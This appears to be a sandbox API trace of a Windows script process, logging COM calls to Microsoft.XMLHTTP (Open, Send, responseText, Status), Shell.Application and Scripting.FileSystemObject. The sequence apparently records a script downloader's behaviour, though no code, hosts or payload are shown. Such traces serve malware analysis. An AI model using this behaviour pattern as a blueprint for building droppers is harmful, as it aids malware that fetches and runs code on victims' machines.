	[0377.708] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c50) returned 0x0
	[0377.708] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0377.708] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c77a8) returned 0x0
	[0377.708] ??2@YAPEAX_K@Z () returned 0x62f330
	[0377.708] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c77a8, pUnkSite=0x62f330) 
	[0377.708] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0377.708] XMLHTTPRequest:IUnknown:Release (This=0x49c77a8) returned 0x0
	[0377.708] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c50) returned 0x0
	[0377.709] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c50) returned 0x3
	[0377.709] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0377.709] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0377.709] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0377.709] longjmp () 
	[0377.709] longjmp () 
	[0377.709] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0377.709] SysStringLen (param_1=0x0) returned 0x0
	[0377.709] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0377.709] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0377.709] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0377.709] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0377.709] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0377.709] ??2@YAPEAX_K@Z () returned 0x62f310
	[0377.710] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f310) 
	[0377.710] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0377.710] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0377.710] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0377.710] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
	[0377.710] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0377.710] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0377.710] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0377.710] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0377.710] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0377.710] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0377.900] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0377.901] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0377.901] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0377.901] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0377.901] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0377.901] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0377.901] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0377.901] SysStringLen (param_1=0x0) returned 0x0
	[0377.901] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0377.901] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0377.901] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0377.901] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0377.901] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0377.902] ??2@YAPEAX_K@Z () returned 0x62f350
	[0377.902] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0377.902] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0377.902] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0377.902] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0377.902] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0377.902] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0377.902] SysStringLen (param_1=0x0) returned 0x0
	[0377.902] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0377.905] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0377.905] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0377.905] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0377.905] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0377.905] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0377.905] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0378.418] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0378.418] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0378.418] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0378.420] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0378.420] SysStringLen (param_1=0x0) returned 0x0
	[0378.420] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0378.420] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0378.420] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0378.420] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0378.420] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7488) returned 0x0
	[0378.420] ??2@YAPEAX_K@Z () returned 0x62f310
	[0378.420] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7488, pUnkSite=0x62f310) 
	[0378.420] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0378.420] XMLHTTPRequest:IUnknown:Release (This=0x49c7488) returned 0x0
	[0378.420] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0378.420] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
	[0378.420] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0378.421] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0378.423] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0378.423] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0378.423] SysStringLen (param_1=0x0) returned 0x0
	[0378.423] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0378.424] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0378.424] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c10) returned 0x0
	[0378.424] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0378.424] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c78) returned 0x0
	[0378.424] ??2@YAPEAX_K@Z () returned 0x62f330
	[0378.424] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c78, pUnkSite=0x62f330) 
	[0378.424] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0378.424] XMLHTTPRequest:IUnknown:Release (This=0x49c5c78) returned 0x0
	[0378.424] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c10) returned 0x0
	[0378.424] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c10) returned 0x3
	[0378.424] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0378.424] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c10, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0378.424] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0378.424] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0378.424] SysStringLen (param_1=0x0) returned 0x0
	[0378.424] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0378.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
